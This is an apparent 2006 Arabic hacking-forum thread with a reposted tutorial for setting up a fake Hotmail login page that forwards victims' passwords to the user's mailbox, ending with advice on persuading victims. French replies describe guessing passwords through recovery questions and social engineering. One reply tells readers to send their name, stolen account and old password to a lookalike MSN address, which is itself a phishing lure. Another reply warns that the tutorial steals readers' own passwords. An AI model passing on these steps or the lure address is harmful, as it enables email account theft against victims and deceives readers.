المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : امتلك صفحة ايميل مزورة فى ثلاث دقائق

combany
11-10-2006, 12:17
( منقوووول )
اخوانى فى منتديات الحلم رمضان كريم
ارجو ان تقبلونى عضو جديد بينكم رغم انى قديم فى عالم الهكرز والاختراق
انا من الذين يؤمنون بالتخصص فى الهكرز بل وفى كل مجال ولذلك اليت على نفسى ان يكون تخصصى في مجال البريد . وانا بمناسبة اول مشاركة لى معكم سوف ابدأ من حيث انتهى الاخرون واقدم لكم قنبلة داوية في عالم اختراق الايميل بالصفحات المزورة وهي تقنية المانية حديثة الظهور .واهم مايميز هذه الصفحة عن سابقاتها هو سرعة امتلاكها وتسخيرها لصالحك حيث انك لن تتعب في تصميمها وانما فقط تجري عليها خطوات بسيطة جدا فتصبح الصفحة ملكك وانا ساقدم لكم اليوم صفحة الهوتميل وستاتى بقية الصفحات تباعا ان شاء المولى .
1- اذهب الى هذا الرابط [فقط الاعضاء المسجلين هم من يمكنهم رؤية الروابط]
2- ستجد بهذا الرابط صفحة هوتميل ( مزورة طبعا ) فى خانة E-mail adress ادخل عنوان صندوق البريد الذى تريد ان تذهب اليه الباسووردات الخاصة بالضحايا .( واذا كنت خايف يمكنك ان تستخدم بريد تكون مستغنى عنه او تنشىء بريد خصيصا لهذا الغرض )
3- في خانة password يجب ان تدخل باسوورد حقيقي ( واقولك ليه )لانك ببساطة ستحتاج الى فتح هذا البريد الذى ادخلته لتجد داخله الرابط .
4- بعد ادخال البيانات اعلاه اضغظ علي زر Sign In .
5- ستنقلك الصفحة الى صفحة اخري بها نفس البيانات التي ادخلتها وذلك للتاكيد فاذا كانت البيانات صحيحة اضغط علي زر continue .
6-ستنتقل الى صفحة اخرى بها عبارة Your Data Has Been Sent .
7- اذهب الى صندوق البريد الذى ادخلته وافتحه ستجد بداخله كود تفعيل اضغط على الرابط وسينقلك الرابط الى صفحة بها رابط الصفحة الجديدة التى اصبحت ملكك وكل الباسووردات التي تاتي عبر هذه الصفحة ستذهب الى صندوق بريدك الذي ادخلته وجربها اولا ليطمئن قلبك وبعد كدة عاد انت وشطارتك فى اقناع ضحاياك بدخول الصفحة وبالهناء والشفاء .
( منقووووول)

samilox
11-10-2006, 08:38
ana jarabt itari9a di pass mich charala

combany
11-10-2006, 10:54
اشكرك اخى على مرورك بس ما فهمت ايش المشكلة بالضبط ارجو ان تشرح لى اكثر عشان اقدر اساعدك
مع تحياتى وتمنياتى لك بالتوفيق

futuros
13-10-2006, 10:23
مشكور اخي علي تعبك وجهدك الضخم في خدمة الشباب
كل الود والمحبة

futuros
13-10-2006, 10:33
j'avoue que j'étais parmi les premiers qui ont commencé à "hacker" les mots de passe
L'idée m'est venue quand j'ai recu un jour un minable msg me demandant d'envoyer mon pseudo, Je l'ai pas envoyé bien sûr mais j'ai gardé cette idée pour faire un formulaire en HTML,quand on veut s'inscrire pour la première fois. L'utilisateur remplit le formulaire avec son mot de passe et quand il clique sur OK, les informations qu'il a saisies sont directement envoyées à mon adresse à moi en plus il y a un moyen extrêmement simple de trouver un mot de passe,
même s'il prend un peu plus de temps que l'envoi d'un formulaire. Quand on s'inscrit à msn ou bien caramail… il faut donner son nom, son prénom, sa date de naissance et répondre à une question personnelle. Ensuite, toutes ces données sont réutilisées par Caramail …. quand l'utilisateur clique sur "j'ai oublié mon mot de passe"... Donc pour trouver le mot de passe d'un utilisateur, il suffit de connaître le nom, le prénom et la date de naissance qu'il a indiquée lors de son inscription, la réponse aux 4 questions personnelles possibles... Autant dire que, avec un peu de psychologie et d'acharnement, un mot de passe est trouvable en 10-15 minutes de conversation... À moins que l'utilisateur dont on veut trouver le mot de passe ait eu la bonne idée de répondre n'importe quoi

J'ai quelques mots de passe mais je m'en sers jamais pour faire du mal aux autres ou leur faire des dégâts dans leurs boîtes.
jai juste réussi a avoir les commandes mais pas m'en servir
J'aimerais faire une correction : ceux qui hackent les boites E-mails des autres à l'aide des formulaires ou des programmes on les appelles des lamers (des débutants sans connaissance qui se prennent pour des héros) sinon les professionnels on les appelle des crashers qui savent l'art du hack et qui s'en servent pour s'amuser. Un hacker hacke une boite e-mail mais n'y touche rie,n ne change pas de mot de passe, ni rien et n'y laisse aucune trace et ne hacke pas n'importe quelle boîte, juste les comptes qui ont des finq commerciales les ******* veulent protéger le net pour que tout soit gratuit et pour que tout le monde puisse utiliser des services gratuits, ils sont des gens extraordinaires, contrairement à ce que pense d'autres, mieux vaut faire confiance à un hacker qu'un autre qui pourra vous trahir.

(¯`;.-> °FuTuRoS° <-;¯)

futuros
13-10-2006, 11:23
futuros ma3akom.....

etape numero 1

La meilleur solution pour récupèrer ton msn

il suffit d'envoyer un message au équipe de hotmail:
admin.service-msn@hotmail.fr

écrit dans objet: PW VERIFICATION INFO ENCLOSED
écrit dans message:

-Ton prénom
- Ton nom
- L'msn volé
- Le pays
- La ville
- Code postal
- Dérniere date quand t'a ouvri ton msn
- Ton ancien mot de passe

puis...envoyer le message

ca prend un peu du temps car il y'a trop de monde ,t'inquitt paaaaa

°FuTuRoS°

combany
14-10-2006, 12:15
العفو اخى futuros واشكرك انا ايضا على اضافاتك القيمة

samilox
15-10-2006, 09:27
fi l7a9i9a akhi ana 9omt bil 3amalia ilnta chara7t bass mawaslni chi o 3ala ayi 7al machkor akhoya l karim

احشاد
16-10-2006, 02:53
مشكور اخي وياريت اتوفلنه صفحه خاصه بالياهو

kiyanoosh
17-10-2006, 07:12
مشكور اخي علي تعبك وجهدك الضخم في خدمة الشباب
كل الود والمحبة

BLASTO
18-10-2006, 01:07
السلام عليكم
انا سويت الطريقه بأيميل جديد
لكن ماصار شي
البيانات اللي انرسلت
انرسلت الى الايميل اللي حطيته؟اذا كان كذا ماجاني شي على الايميل
وانا رح استنى واشوف
see u

emailer
19-10-2006, 01:18
هذا الموضوع منقول من منتديات منظمة الاختراق العالمية وكاتب الموضوع الاصلى هو company وليس combany لاحظ الفرق بين p و b والكاتب الاصلى هو مشرف قسم اختراق الايميل بالمنظمة اما الاخر فيبدو انه متاثر بالاول لدرجة انه اقتبس حتى اسمه لكنه اخطا فى احد الحروف . ( مجرد ملاحظة )

اسير الحزم
23-10-2006, 05:21
اناااا سووووووويت كل شي وارولحد الحييييين ماجاني شي على الايميييييييل

ارجووووووو الافااااااااااااااده

عمار555
27-10-2006, 12:58
خخخخخخخخخخخخخخخخخخخخخخخ

هذا طريقة لسرقة ايميلاكم احذرووووووووووووووووووووو غير كلمة السر الان اذا انت سويت ذالك

سلاااااااام

اسماعيل ابراهيم
27-10-2006, 09:41
بسم الله الرحمن الرحيم
اخوى طريقه الشرح ممتازه وكل شئ تمام بس العباره الى قولت هتلقيه
Your Data Has Been Sent ملهاش اى وجود
على كل حال شكرا ليك

yassino_20
31-10-2006, 05:04
iبسم الله الرحمن الرحيم

merci aky

combany